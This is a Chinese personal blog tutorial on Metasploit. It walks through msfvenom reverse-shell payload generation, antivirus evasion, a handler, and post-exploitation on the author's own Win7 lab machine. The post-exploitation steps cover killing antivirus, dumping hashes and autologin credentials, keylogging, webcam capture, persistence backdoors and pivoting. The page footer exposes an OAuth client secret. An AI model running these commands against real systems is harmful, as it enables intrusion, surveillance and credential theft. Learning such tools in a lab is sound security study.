<!DOCTYPE html>

<html lang="zh-CN">

<head>
    
    <title>Metasploit工具使用 - Jay的个人博客</title>
    <meta charset="UTF-8">
    <meta name="description" content="记录分享学习">
    <meta name="keywords" content="记录,学习,分享">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5">
    
    

    <link rel="shortcut icon" href="/assets/logoko.png" type="image/png" />
    <meta name="description" content="Metasploit简介metasploit是一款免费可下载的框架，附带数百个已知的软件漏洞，并保持频繁更新，是渗透领域最流行的框架，在kali中自带。可以使用apt-get install metasploit-framework 来更新或者使用自带的升级命令msfupdate。 Metasploit模块划分msf为总模块，其他均为分支模块，分为以下几个模块：辅助攻击模块：auxiliaary，">
<meta property="og:type" content="article">
<meta property="og:title" content="Metasploit工具使用">
<meta property="og:url" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/index.html">
<meta property="og:site_name" content="Jay的个人博客">
<meta property="og:description" content="Metasploit简介metasploit是一款免费可下载的框架，附带数百个已知的软件漏洞，并保持频繁更新，是渗透领域最流行的框架，在kali中自带。可以使用apt-get install metasploit-framework 来更新或者使用自带的升级命令msfupdate。 Metasploit模块划分msf为总模块，其他均为分支模块，分为以下几个模块：辅助攻击模块：auxiliaary，">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-12-34-38.png">
<meta property="og:image" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-12-05-59.png">
<meta property="og:image" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-13-39-28.png">
<meta property="og:image" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-15-09-05.png">
<meta property="og:image" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-16-51-10.png">
<meta property="og:image" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-16-52-57.png">
<meta property="og:image" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-15-23-53.png">
<meta property="og:image" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-16-28-24.png">
<meta property="og:image" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-16-29-17.png">
<meta property="og:image" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-16-29-58.png">
<meta property="og:image" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-16-33-03.png">
<meta property="og:image" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-16-38-53.png">
<meta property="og:image" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-16-48-07.png">
<meta property="og:image" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-18-12-33-32.png">
<meta property="og:image" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-18-16-31-15.png">
<meta property="og:image" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-18-16-34-00.png">
<meta property="og:image" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-18-16-45-02.png">
<meta property="og:image" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-18-16-52-44.png">
<meta property="article:published_time" content="2023-04-17T03:35:19.000Z">
<meta property="article:modified_time" content="2023-04-18T08:54:21.744Z">
<meta property="article:author" content="Jay jay">
<meta property="article:tag" content="学习">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-12-34-38.png">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/combine/npm/highlight.js@9.15.8/styles/atom-one-dark.css,npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css,gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css,npm/hexo-theme-nexmoe@latest/source/lib/mdui_043tiny/css/mdui.css,npm/hexo-theme-nexmoe@latest/source/lib/iconfont/iconfont.css?v=233" crossorigin>
    <link rel="stylesheet" href="/css/style.css?v=1681885929685">
    
    <link rel="stylesheet" href="/lib/iconfont/iconfont.css?v=1681885929685">
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="mdui-drawer-body-left">
    
    <div id="nexmoe-background">
        <div class="nexmoe-bg" style="background-image: url(/assets/background.gif)"></div>
        <div class="mdui-appbar mdui-shadow-0">
            <div class="mdui-toolbar">
                <a mdui-drawer="{target: '#drawer', swipe: true}" title="menu" class="mdui-btn mdui-btn-icon mdui-ripple"><i class="mdui-icon nexmoefont icon-menu"></i></a>
                <div class="mdui-toolbar-spacer"></div>
                <!--<a href="javascript:;" class="mdui-btn mdui-btn-icon"><i class="mdui-icon material-icons">search</i></a>-->
                <a href="/" title="Jay jay" class="mdui-btn mdui-btn-icon"><img src="/assets/avatar.jpg" alt="Jay jay"></a>
            </div>
        </div>
    </div>
    <div id="nexmoe-header">
        <div class="nexmoe-drawer mdui-drawer" id="drawer">
    <div class="nexmoe-avatar mdui-ripple">
        <a href="/" title="Jay jay">
            <img src="/assets/avatar.jpg" alt="Jay jay" alt="Jay jay">
        </a>
    </div>
    <div class="nexmoe-count">
        <div><span>文章</span>28</div>
        <div><span>标签</span>2</div>
        <div><span>分类</span>0</div>
    </div>
    <div class="nexmoe-list mdui-list" mdui-collapse="{accordion: true}">
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/" title="回到首页">
            <i class="mdui-list-item-icon nexmoefont icon-home"></i>
            <div class="mdui-list-item-content">
                回到首页
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/archive.html" title="文章归档">
            <i class="mdui-list-item-icon nexmoefont icon-container"></i>
            <div class="mdui-list-item-content">
                文章归档
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/about.html" title="关于博客">
            <i class="mdui-list-item-icon nexmoefont icon-info-circle"></i>
            <div class="mdui-list-item-content">
                关于博客
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/PY.html" title="我的朋友">
            <i class="mdui-list-item-icon nexmoefont icon-unorderedlist"></i>
            <div class="mdui-list-item-content">
                我的朋友
            </div>
        </a>
        
    </div>
    <aside id="nexmoe-sidebar">
    
    <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-search">
         
            <form id="search_form" action_e="https://www.baidu.com/s?wd=" onsubmit="return search();">
                <label><input id="search_value" name="q" type="search" placeholder="搜索"></label>
            </form>
         
    </div>
</div>
    
    <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-social">
        <a class="mdui-ripple" href="https://space.bilibili.com/436182677" target="_blank" mdui-tooltip="{content: '哔哩哔哩'}" style="color: rgb(231, 106, 141);background-color: rgba(231, 106, 141, .15);">
            <i class="nexmoefont icon-bilibili"></i>
        </a><a class="mdui-ripple" href="https://github.com/yyj-xx/yyj-xx.github.io" target="_blank" mdui-tooltip="{content: 'GitHub'}" style="color: rgb(25, 23, 23);background-color: rgba(25, 23, 23, .15);">
            <i class="nexmoefont icon-github"></i>
        </a>
    </div>
</div>
    
    
  <div class="nexmoe-widget-wrap">
    <div id="randomtagcloud" class="nexmoe-widget tagcloud nexmoe-rainbow">
      <a href="/tags/%E5%AD%A6%E4%B9%A0/" style="font-size: 20px;">学习</a> <a href="/tags/%E5%AD%A6%E4%B9%A0%E5%86%99%E5%8D%9A%E5%AE%A2/" style="font-size: 10px;">学习写博客</a>
    </div>
    
  </div>

    
    

    
</aside>
    <div class="nexmoe-copyright">
        &copy; 2023 Jay jay
        Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
        & <a href="https://github.com/theme-nexmoe/hexo-theme-nexmoe" target="_blank">Nexmoe</a>
        <br>人生需要不断的探索
    </div>
</div><!-- .nexmoe-drawer -->
    </div>
    <div id="nexmoe-content">
        <div class="nexmoe-primary">
            <div class="nexmoe-post">

  <article>
      
          <div class="nexmoe-post-cover" style="padding-bottom: 66.66666666666666%;"> 
              <img data-src="/assets/background.gif" data-sizes="auto" alt="Metasploit工具使用" class="lazyload">
              <h1>Metasploit工具使用</h1>
          </div>
      
      
      <div class="nexmoe-post-meta nexmoe-rainbow" style="margin:10px 0!important;">
    <a><i class="nexmoefont icon-calendar-fill"></i>2023年04月17日</a>
    <a><i class="nexmoefont icon-areachart"></i>2.5k 字</a>
    <a><i class="nexmoefont icon-time-circle-fill"></i>大概 11 分钟</a>
</div>

      

      <h2 id="Metasploit简介"><a href="#Metasploit简介" class="headerlink" title="Metasploit简介"></a>Metasploit简介</h2><p>metasploit是一款免费可下载的框架，附带数百个已知的软件漏洞，并保持频繁更新，是渗透领域最流行的框架，在kali中自带。可以使用apt-get install metasploit-framework 来更新或者使用自带的升级命令msfupdate。</p>
<h2 id="Metasploit模块划分"><a href="#Metasploit模块划分" class="headerlink" title="Metasploit模块划分"></a>Metasploit模块划分</h2><p>msf为总模块，其他均为分支模块，分为以下几个模块：<br>辅助攻击模块：auxiliaary，扫描器，扫描主机系统，寻找可用漏洞<br>渗透攻击模块：exploits，选择配置一个漏洞利用模块<br>攻击载荷模块：payloads，选择并配置一个攻击载荷模块，主要用来建立稳定的连接，可以返回shell和进程注入<br>后渗透攻击模块：post,用于内网渗透的各种操作<br>编码器模块：encoders，选择编码技术绕过杀软或其他免杀方式<br>躲避模块：evasion是msf用来做免杀的效果一般<br>空指令模块：nops，用于提高payload稳定性和维持大小。<br>所有模块位置：/user/share/metasploit-framework/modules/<br><img data-fancybox="gallery" data-sizes="auto" data-src="/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-12-34-38.png" alt="模块位置" class="lazyload"></p>
<h2 id="启动metasploit"><a href="#启动metasploit" class="headerlink" title="启动metasploit"></a>启动metasploit</h2><p>首次启动：<br>启动postgresql-&gt;启动metasploit-&gt;连接postgtesql<br>启动步骤：<br>1、启动postgresql：service postgresql start<br>2、初始化msfdb：msfdb init(默认创建的数据库名称： msf，msf_test； 用户名： msf； 密码默认值为空)<br>3、启动msf：msfconsole<br>4、使用db_status可以查看数据库连接状态<br><img data-fancybox="gallery" data-sizes="auto" data-src="/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-12-05-59.png" alt="命令执行" class="lazyload"><br>二次启动metasploit直接使用命令msfconsole启动</p>
<h2 id="渗透步骤exploit"><a href="#渗透步骤exploit" class="headerlink" title="渗透步骤exploit"></a>渗透步骤exploit</h2><ol>
<li>search xxx #搜索某个漏洞</li>
<li>use xxx #使用某个漏洞利用模块</li>
<li>show options(options) #查看配置选项，可以使用info查看详细信息</li>
<li>set payload #配置攻击载荷</li>
<li>exploit(run) #执行渗透攻击</li>
</ol>
<h2 id="常用命令参数"><a href="#常用命令参数" class="headerlink" title="常用命令参数"></a>常用命令参数</h2><figure class="highlight shell"><table><tr><td class="code"><pre><code class="hljs shell">reload_all #从目录重载所有模块，导入模块也需要使用此命令<br>back #后退命令，移除当前上下文，用于模块切换<br>info #查看模块详细信息<br>check #检查目标是否受某个漏洞影响<br><br>search type:模块类型 path:模块路径 -S 过滤 服务 <br>如：search type:auxiliary -S scanner ssh表示搜索辅助扫描模块的ssh服务<br><br><br>sessions #会话管理<br>sessions -l #列出所有会话<br>sessions -K #终止所有会话<br>sessions -i id #进入某个会话<br>sessions -v #以详细模式列出会话<br>sessions -u #在许多平台上将shell升级到meterpreter会话<br>background 或 bg #将会话放到后台<br><br>show options #显示可选选项<br>     auxiliary #显示所有辅助模块<br>     exploits #显示所有漏洞利用模块<br>     payloads #显示所有有效载荷<br>     targets #显示所有可用目标<br>     advanced #显示高级选项<br>     encoders #显示可用编码器列表<br><br>unset [moudle options] #清楚moudle options<br></code></pre></td></tr></table></figure>

<p>导入模块，模块命名不能有-，可以用_代替。reload_all #从目录重载所有模块。导入模块也需要使用此命令</p>
<h2 id="辅助模块anxiliary"><a href="#辅助模块anxiliary" class="headerlink" title="辅助模块anxiliary"></a>辅助模块anxiliary</h2><p>使用show可以展示出可以使用的扫描模块有很多<br><img data-fancybox="gallery" data-sizes="auto" data-src="/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-13-39-28.png" alt="模块" class="lazyload"><br>使用use 编号可以使用编号对应的模块<br>常用的端口扫描模块</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><code class="hljs sh">use auxiliary/scanner/portmap/portmap_amp<br>use auxiliary/scanner/portscan/ftpbounce<br>use auxiliary/scanner/portscan/tcp<br>use auxiliary/scanner/portscan/ack<br>use auxiliary/scanner/portscan/syn<br>use auxiliary/scanner/portscan/xmas<br></code></pre></td></tr></table></figure>

<p>常用的服务扫描</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><code class="hljs sh">auxiliary/scanner/ssh/ssh_login		<span class="hljs-comment">#SSH爆破</span><br>auxiliary/scanner/vnc/vnc_none_auth	<span class="hljs-comment">#VNC空口令扫描</span><br>auxiliary/scanner/telnet/telnet_login<span class="hljs-comment">#SSH爆破</span><br>auxiliary/scanner/smb/smb_version	<span class="hljs-comment">#SMB系统版本扫描</span><br>auxiliary/scanner/smb/smb_enumusers	<span class="hljs-comment">#SMB枚举</span><br>auxiliary/scanner/smb/smb_login		<span class="hljs-comment">#SMB弱口令登录</span><br>auxiliary/admin/smb/psexec_command	<span class="hljs-comment">#登录SMB且执行命令</span><br><br>auxiliary/scanner/mssql/mssql_ping	<span class="hljs-comment">#MSSQL主机信息扫描</span><br>auxiliary/admin/mssql/mssql_enum	<span class="hljs-comment">#MSSQL枚举</span><br>auxiliary/scanner/mysql/mysql_login	<span class="hljs-comment">#MySQL弱口令扫描</span><br>auxiliary/admin/mysql/mysql_enum	<span class="hljs-comment">#MySQL枚举</span><br><br></code></pre></td></tr></table></figure>

<h2 id="攻击载荷和编码（payloads-amp-amp-encoders）"><a href="#攻击载荷和编码（payloads-amp-amp-encoders）" class="headerlink" title="攻击载荷和编码（payloads &amp;&amp; encoders）"></a>攻击载荷和编码（payloads &amp;&amp; encoders）</h2><p>可以使用以下方式生成payload和编码</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs txt">use payload 或标号 -E 强制编码 -e 要使用的模块编码器模块的名称 -f 输出文件名（默认stdout） -t 输出格式：raw，ruby，perl，rb，pl，c，java，dll，exe，elf，vbs，asp，war等 -b要避免的字符列表：&#x27;\x00\xff&#x27;<br></code></pre></td></tr></table></figure>

<p>常用payload</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs txt">windows/meterpreter/bind_tcp 		# 正向连接<br>windows/meterpreter/reverse_tcp 	# 反向连接<br>windows/meterpreter/reverse_http 	# 通过监听80端口反向连接<br>windows/meterpreter/reverse_https 	# 通过监听443端口反向连接<br></code></pre></td></tr></table></figure>

<p>可以使用msfvenom生成shellcode编码免杀<br>msfvenom参数使用详解：</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs txt">-l ,--list&lt;type&gt;    #列出所有可用的项目其中值可设为payloads，encoders，nops，platforms，archs，encrypt，formats<br>-p ,--payload &lt;payload&gt;     #指定payload，如果指定为-则从标准输入流中读取<br>--list-options  #列出--payload&lt;payload&gt;的标准，高级和规避选项<br>-f  #指定输出格式 <br>--list-form #列出格式<br>-e  #指定编码方式<br>--list-encoder  #列出编码方式<br>--sec-name &lt;value&gt; #生成windows二进制文件时使用的新名称，默认四个随机数<br>--smallest #使用所有可用的编码器生成最小的payload<br>--encrypt 值 #应用于shellcode的加密或编码类型 (--list encrypt 列出)<br>--encrypt-key 值 #用于加密的密钥<br>--encrypt-iv 值 #加密初始化向量<br>-a，--arch #指定目标系统架构（--list-archs 列出）<br>--platform &lt;platform&gt; #指定目标系统平台（--list-platform）<br>-o #保存payload<br>-b,--bad-chars &lt;list&gt; #设置需要在payload中避免出现的字符<br>-n,--nopsled &lt;length&gt; #指定nop在payload中的数量<br>-s,--space &lt;length&gt; #设置未经编码的payload最大长度<br>--encoder-space &lt;length&gt; #编码后的最大长度<br>-i, --iterations &lt;count&gt; # 设置 Payload 的编码次数<br>-c, --add-code &lt;path&gt; # 指定包含一个额外的win32 shellcode文件<br>-x, --template &lt;path&gt; # 指定一个特定的可执行文件作为模板<br>-k, --keep # 保护模板程序的功能，注入的payload作为一个新的进程运行<br>-v, --var-name &lt;value&gt; # 指定一个变量名（当添加 -f 参数的时候，例如 -f python，那么输出为 python 代码， payload 会被按行格式化为 python 代码，追加到一个 python 变量中，这个参数即为指定 python 变量的变量名）<br>-t, --timeout &lt;second&gt; # 设置从STDIN读取payload的等待时间（默认为30,0为禁用）<br>-h, --help # 帮助 <br></code></pre></td></tr></table></figure>

<p>windows</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><code class="hljs sh">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的 ip LPORT=kali监听端口 -f exe &gt;1.exe<br>参数选项：<br>-p 指定payload<br>-a 自定系统架构<br>-e 编码器，x86/shikata_ga_nai<br>-i 迭代器，对有效载荷的编码次数<br>-f 输出文件格式：exe，dll，raw<br>-o 指定文件名输出文件<br></code></pre></td></tr></table></figure>

<p><img data-fancybox="gallery" data-sizes="auto" data-src="/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-15-09-05.png" alt="生成" class="lazyload"></p>
<p>linux<br><code>msfvenom -p payload LHOST=kali ip LPORT=kali监听端口 -f 文件格式&gt;文件名</code></p>
<p>常见生成：</p>
<p><img data-fancybox="gallery" data-sizes="auto" data-src="/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-16-51-10.png" alt="常见生成shellcode" class="lazyload"></p>
<p><img data-fancybox="gallery" data-sizes="auto" data-src="/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-16-52-57.png" alt="常见格式" class="lazyload"></p>
<h2 id="免杀"><a href="#免杀" class="headerlink" title="免杀"></a>免杀</h2><p>木马绕过免杀的本质是更改特征码方式有以下几种：编码、加壳免杀、二次编译、分离免杀：即将shellcode和加载器分离。目前msfvenom的encoder特征基本都进入了杀软的漏洞库，很难实现单一encoder编码而绕过杀软，所以对shellcode进行进一步修改编译成了msf免杀的主流。<br>互联网上有很多借助于C、C#、python等语言对shellcode进行二次编码从而达到免杀的效果。</p>
<h2 id="监听反弹shell"><a href="#监听反弹shell" class="headerlink" title="监听反弹shell"></a>监听反弹shell</h2><figure class="highlight sh"><table><tr><td class="code"><pre><code class="hljs sh">use exploit/multi/handler 使用这个监听模块<br><span class="hljs-built_in">set</span> payload windows/x64/meterpreter/reverse_tcp <span class="hljs-comment">#注意这要和生成的木马保持一致</span><br><span class="hljs-built_in">set</span> lhost kali的ip <span class="hljs-comment">#设置本地地址要和木马一致</span><br><span class="hljs-built_in">set</span> lport 端口号 <span class="hljs-comment">#设置本地侦听端口和木马一致</span><br>run <span class="hljs-comment">#执行</span><br></code></pre></td></tr></table></figure>

<p><img data-fancybox="gallery" data-sizes="auto" data-src="/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-15-23-53.png" alt="kali侦听" class="lazyload"><br>最重要的payload设置<br><img data-fancybox="gallery" data-sizes="auto" data-src="/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-16-28-24.png" alt="设置payload" class="lazyload"><br>将生成的木马1.exe上传到win7然后执行<br><img data-fancybox="gallery" data-sizes="auto" data-src="/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-16-29-17.png" alt="运行" class="lazyload"><br>kali的msf后台上线，进入shell了<br><img data-fancybox="gallery" data-sizes="auto" data-src="/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-16-29-58.png" alt="上线" class="lazyload"><br><img data-fancybox="gallery" data-sizes="auto" data-src="/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-16-33-03.png" alt="测试是否成功" class="lazyload"></p>
<h2 id="后渗透模块（post）"><a href="#后渗透模块（post）" class="headerlink" title="后渗透模块（post）"></a>后渗透模块（post）</h2><p>以下命令是在反弹shell成功后运行</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs txt">run post/windows/gather/checkvm #检查目标是否虚拟机<br>run post/linux/gather/checkvm<br>run post/windows/manage/killav #关闭杀软<br>run post/windows/manage/enable_rdp #开启目标远程桌面<br>run post/windows/gather/enum_logged_on_users #列举当前登陆用户，和最近登陆过的用户<br>run post/windows/gather/enum_applications #列举应用程序<br>run windows/gather/credentials/windows_autologin#列举自动登陆的用户名和密码<br></code></pre></td></tr></table></figure>

<p>运行测试<br><img data-fancybox="gallery" data-sizes="auto" data-src="/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-16-38-53.png" alt="查看" class="lazyload"></p>
<h2 id="Meterpreter"><a href="#Meterpreter" class="headerlink" title="Meterpreter"></a>Meterpreter</h2><p><strong>持久化</strong><br>刚才刚刚获得的meterpreter shell，该shell是非常脆弱的，可以把它和目标机中一个稳定的程序绑定，NT AUTHORITY\SYSTEM 这个账号是隐藏的就是windows至高权限账户，根administrator拥有相同权限：</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><code class="hljs sh">getpid <span class="hljs-comment">#查看当前meterpreter shell的进程号</span><br>ps <span class="hljs-comment">#获取目标进程</span><br>migrate 进程号 <span class="hljs-comment">#将shell迁移到pid为进程号的进程中</span><br></code></pre></td></tr></table></figure>

<p><img data-fancybox="gallery" data-sizes="auto" data-src="/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-17-16-48-07.png" alt="持久化" class="lazyload"></p>
<p>常用命令：</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><code class="hljs sh"><span class="hljs-built_in">pwd</span>、ls、<span class="hljs-built_in">cd</span><br>getuid		<span class="hljs-comment">#查看当前权限</span><br>getsystem	<span class="hljs-comment">#获得系统管理员权限（要本地管理员权限运行）</span><br>hashdump	<span class="hljs-comment">#抓哈希密码</span><br>sysinfo		<span class="hljs-comment">#查看系统信息</span><br>idletim     <span class="hljs-comment">#查看目标系统已运行时间</span><br>route		<span class="hljs-comment">#查看目标机完整网络设置</span><br>shell		<span class="hljs-comment">#进入目标机shell，exit退出she</span><br>background	<span class="hljs-comment">#将meterpreter隐藏在后台</span><br><br>upload ./1.txt c:\\1.txt		<span class="hljs-comment">#上传文件</span><br>download c:\1.txt ./			<span class="hljs-comment">#下载文件</span><br>search -f *.txt -d c://			<span class="hljs-comment">#搜索文件</span><br><br>keyscan_start	<span class="hljs-comment">#启动键盘记录</span><br>keyscan_stop	<span class="hljs-comment">#停止键盘记录</span><br>keyscan_dump	<span class="hljs-comment">#转储键盘记录的内容</span><br>screenshot		<span class="hljs-comment">#抓取截屏</span><br>webcam_list		<span class="hljs-comment">#摄像头列表</span><br>webcam_snap		<span class="hljs-comment">#摄像头拍照</span><br>webcam_stream	<span class="hljs-comment">#抓取视频</span><br><br><span class="hljs-comment">#Kali-Linux下登录远程桌面</span><br>sudo rdesktop -f 目标IP<br><br>route add IP 子网掩码    <span class="hljs-comment">#添加路由，先background</span><br></code></pre></td></tr></table></figure>

<p>在这里可以使用persistence模块留后门,也就是建立持续性后门。<br>persistence是用来进行权限维持的，可以利用它创建注册表和文件，这个模块是我们获取了meterpreter shell后使用<br>我们可以查看persistence查看帮助信息通过<code>run persistence -h</code><br><img data-fancybox="gallery" data-sizes="auto" data-src="/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-18-12-33-32.png" alt="查看" class="lazyload"><br>这里报错暂时没有解决。</p>
<p>也可以使用metsvc生成后门<code>run metsvc -h</code><br><img data-fancybox="gallery" data-sizes="auto" data-src="/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-18-16-31-15.png" alt="后门" class="lazyload"></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs txt">-A   安装后门后，自动启动exploit/multi/handler模块连接后门<br>-h  查看帮助<br>-r  删除后门<br></code></pre></td></tr></table></figure>

<p>安装成功后会在c:\windows\temp中创建一个新目录上传metsvc.dll、metsvc-server.exe、metsvc.exe<br><img data-fancybox="gallery" data-sizes="auto" data-src="/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-18-16-34-00.png" alt="生成后门" class="lazyload"><br>我们打开新的msf使用handler连接，这里需要注意生成的payload已经改变我们需要重新配置为<code>set payload windows/metsvc_bind_tcp</code><br>查看配置这里我们需要指定远程地址为win7地址远程端口号为31337这里是一个正向连接的shell<br><img data-fancybox="gallery" data-sizes="auto" data-src="/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-18-16-45-02.png" alt="配置" class="lazyload"><br>执行run<br><img data-fancybox="gallery" data-sizes="auto" data-src="/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/2023-04-18-16-52-44.png" alt="执行" class="lazyload"><br>不知什么原因死了</p>
<h2 id="网络穿透"><a href="#网络穿透" class="headerlink" title="网络穿透"></a>网络穿透</h2><p>拿到反向shell之后获取目标网络信息<br><code>run get_local_subnets</code></p>
<p>使用autoroute模块添加路由</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><code class="hljs sh">run autoroute -s 192.168.23.0/225.225.225.0<br>run autoroute -p <span class="hljs-comment">#列出添加了路由规则存活的session</span><br></code></pre></td></tr></table></figure>

<p>添加完成后返回上一层，这里一定要保证添加了路由规则的sessions的存活,如果sessions掉了对应的路由规则也就失效了</p>

  </article>

  
      
    <div class="nexmoe-post-copyright">
        <strong>本文作者：</strong>Jay jay<br>
        <strong>本文链接：</strong><a href="https://yyj-xx.github.io/2023/04/17/Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/" title="https:&#x2F;&#x2F;yyj-xx.github.io&#x2F;2023&#x2F;04&#x2F;17&#x2F;Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8&#x2F;" target="_blank" rel="noopener">https:&#x2F;&#x2F;yyj-xx.github.io&#x2F;2023&#x2F;04&#x2F;17&#x2F;Metasploit%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8&#x2F;</a><br>
        
            <strong>版权声明：</strong>本文采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/cn/deed.zh" target="_blank">CC BY-NC-SA 3.0 CN</a> 协议进行许可
        
    </div>


  
  
  <div class="nexmoe-post-meta nexmoe-rainbow">
    
    
        <a class="nexmoefont icon-tag-fill -none-link" href="/tags/%E5%AD%A6%E4%B9%A0/" rel="tag">学习</a>
    
</div>

  
      <div class="nexmoe-post-footer">
          <section class="nexmoe-comment">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@latest/dist/gitalk.min.css">
<div id="gitalk"></div>
<script src="https://cdn.jsdelivr.net/npm/gitalk@latest/dist/gitalk.min.js"></script>
<script type="text/javascript">
    var gitalk = new Gitalk({
        clientID: '906d60a925bbfc786e36',
        clientSecret: 'eef34b48d710958974d793333753521d0474c243',
        id: window.location.pathname,
        repo: 'yyj-xx.github.io',
        owner: 'yyj-xx',
        admin: 'yyj-xx'
    })
    gitalk.render('gitalk')
</script>
</section>
      </div>
  
</div>
            <div class="nexmoe-post-right">
              <div class="nexmoe-fixed">
                  <div class="nexmoe-tool"> 
                    
                      
                        
                          
                          
                              <button class="mdui-fab catalog" style="overflow:unset;">
                                  <i class="nexmoefont icon-i-catalog"></i>
                                  <div class="nexmoe-toc">
